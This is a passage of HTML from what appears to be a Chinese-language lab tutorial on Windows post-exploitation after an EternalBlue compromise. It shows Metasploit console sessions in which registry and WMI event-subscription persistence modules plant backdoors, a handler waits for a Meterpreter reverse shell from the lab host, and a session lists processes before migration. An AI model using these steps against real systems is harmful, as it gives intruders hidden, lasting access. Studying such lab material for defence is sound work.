yaml\"><\/code><\/pre>\n<p>7\u3001\u4f7f\u7528<code>Windows<\/code>\u6ce8\u518c\u8868\u6301\u4e45\u5316\u6a21\u5757\u690d\u5165\u540e\u95e8\u3002\u6211\u4eec\u5229\u7528\u6c38\u6052\u4e4b\u84dd\u653b\u51fb\u83b7\u5f97\u7684\u4f1a\u8bdd\u8fdb\u884c\u540e\u95e8\u690d\u5165\u64cd\u4f5c\u3002<\/p>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/smb\/ms17_010_eternalblue) &gt; use exploit\/windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">smsf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> SESSION <span class=\"hljs-number\">6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">SESSION =&gt; <span class=\"hljs-number\">6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">PAYLOAD =&gt; windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> LHOST <span class=\"hljs-number\">192.168<\/span>.<span class=\"hljs-number\">177.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LHOST =&gt; <span class=\"hljs-number\">192.168<\/span>.<span class=\"hljs-number\">177.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> LPORT <span class=\"hljs-number\">9999<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt; exploit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Generating payload blob..<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] Generated payload, <span class=\"hljs-number\">5944<\/span> bytes<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Root path <span class=\"hljs-keyword\">is<\/span> HKCU<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Installing payload blob..<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] Created registry key HKCU\\Software\\cPH3pG4G<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] Installed payload blob <span class=\"hljs-keyword\">to<\/span> HKCU\\Software\\cPH3pG4G\\q3jhQYTs<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Installing run key<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[-] Exploit aborted due <span class=\"hljs-keyword\">to<\/span> failure: unknown: Could <span class=\"hljs-keyword\">not<\/span> install run key<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/registry_persistence) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<p>\u8fd9\u91cc\u56e0\u4e3a\u73af\u5883\u95ee\u9898\uff0c\u5e76\u672a\u690d\u5165\u6210\u529f\u3002<\/p>\n<p>8\u3001\u5982\u679c\u6210\u529f\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u8bbe\u7f6e\u76d1\u542c\uff0c\u4ee5\u4fbf\u76ee\u6807\u91cd\u542f\u7684\u65f6\u5019\u83b7\u5f97\u53cd\u5411<code>shell<\/code>\u4f1a\u8bdd<\/p>\n<pre><code class=\"hljs linux copyable sql\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/<span class=\"hljs-keyword\">handler<\/span>) &gt; <span class=\"hljs-keyword\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">PAYLOAD =&gt; windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/<span class=\"hljs-keyword\">handler<\/span>) &gt; <span class=\"hljs-keyword\">set<\/span> LHOST <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LHOST =&gt; <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/<span class=\"hljs-keyword\">handler<\/span>) &gt; <span class=\"hljs-keyword\">set<\/span> LPORT <span class=\"hljs-number\">9999<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LPORT =&gt; <span class=\"hljs-number\">9999<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/<span class=\"hljs-keyword\">handler<\/span>) &gt; exploit -j<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Exploit running <span class=\"hljs-keyword\">as<\/span> background job <span class=\"hljs-number\">1.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Exploit completed, but <span class=\"hljs-keyword\">no<\/span> <span class=\"hljs-keyword\">session<\/span> was created.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Started <span class=\"hljs-keyword\">reverse<\/span> TCP <span class=\"hljs-keyword\">handler<\/span> <span class=\"hljs-keyword\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span>:<span class=\"hljs-number\">9999<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/<span class=\"hljs-keyword\">handler<\/span>) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable sql\"><\/code><\/pre>\n<p>9\u3001\u5f53\u76ee\u6807\u673a\u5668\u91cd\u542f\u540e\uff0c\u53ef\u4ee5\u83b7\u5f97\u4f1a\u8bdd<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt; reboot<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Rebooting...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<p>10\u3001\u5229\u7528<code>WMI<\/code>\u4e8b\u4ef6\u8ba2\u9605\u521b\u5efa\u65e0\u6587\u4ef6\u540e\u95e8<\/p>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/smb\/ms17_010_eternalblue) &gt; use exploit\/windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> SESSION <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">SESSION =&gt; <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> CALLBACK_INTERVAL <span class=\"hljs-number\">60000<\/span> <span class=\"hljs-comment\">\/\/\u8bbe\u7f6e\u56de\u8c03\u65f6\u95f4\u4e3a1\u5206\u949f<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">CALLBACK_INTERVAL =&gt; <span class=\"hljs-number\">60000<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> EVENT_ID_TRIGGER <span class=\"hljs-number\">4624<\/span> <span class=\"hljs-comment\">\/\/\u8bbe\u7f6e\u4e8b\u4ef6ID<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">EVENT_ID_TRIGGER =&gt; <span class=\"hljs-number\">4624<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> USERNAME_TRIGGER Administrator <span class=\"hljs-comment\">\/\/\u8bbe\u7f6e\u7528\u6237<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">USERNAME_TRIGGER =&gt; Administrator<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">PAYLOAD =&gt; windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">smsf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> LHOST <span class=\"hljs-number\">192.168<\/span>.<span class=\"hljs-number\">177.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LHOST =&gt; <span class=\"hljs-number\">192.168<\/span>.<span class=\"hljs-number\">177.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; <span class=\"hljs-keyword\">set<\/span> LPORT <span class=\"hljs-number\">4433<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LPORT =&gt; <span class=\"hljs-number\">4433<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows\/<span class=\"hljs-keyword\">local<\/span>\/wmi_persistence) &gt; exploit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[-] This module cannot run <span class=\"hljs-keyword\">as<\/span> System<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<p>11\u3001\u63d0\u793a\u672a\u6210\u529f\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528<code>migrate<\/code>\u5c06<code>meterpreter shell<\/code>\u8fdb\u7a0b\u8fdb\u884c\u8fdb\u7a0b\u8fc1\u79fb\uff0c\u5c31\u662f\u5c06<code>meterpreter shell<\/code>\u8fdb\u7a0b\u8fc1\u79fb\u5230\u76f8\u5bf9\u7a33\u5b9a\u5e94\u7528\u7684\u8fdb\u7a0b\u91cc\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/local\/wmi_persistence)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-i<\/span> <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">interaction<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-number\">1<\/span><span class=\"hljs-string\">...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">ps<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Process<\/span> <span class=\"hljs-string\">List<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">============<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PID<\/span> <span class=\"hljs-string\">PPID<\/span> <span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Arch<\/span> <span class=\"hljs-string\">Session<\/span> <span class=\"hljs-string\">User<\/span> <span class=\"hljs-string\">Path<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">---<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">0<\/span> <span class=\"hljs-number\">0<\/span> [<span class=\"hljs-string\">System<\/span> <span class=\"hljs-string\">Process<\/span>]<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">System<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">0<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">232<\/span> <span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">smss.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span> <span class=\"hljs-string\">\\SystemRoot\\System32\\smss.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">300<\/span> <span class=\"hljs-number\">472<\/span> <span class=\"hljs-string\">svchost.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\NETWORK<\/span> <span class=\"hljs-string\">SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">316<\/span> <span class=\"hljs-number\">304<\/span> <span class=\"hljs-string\">csrss.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span 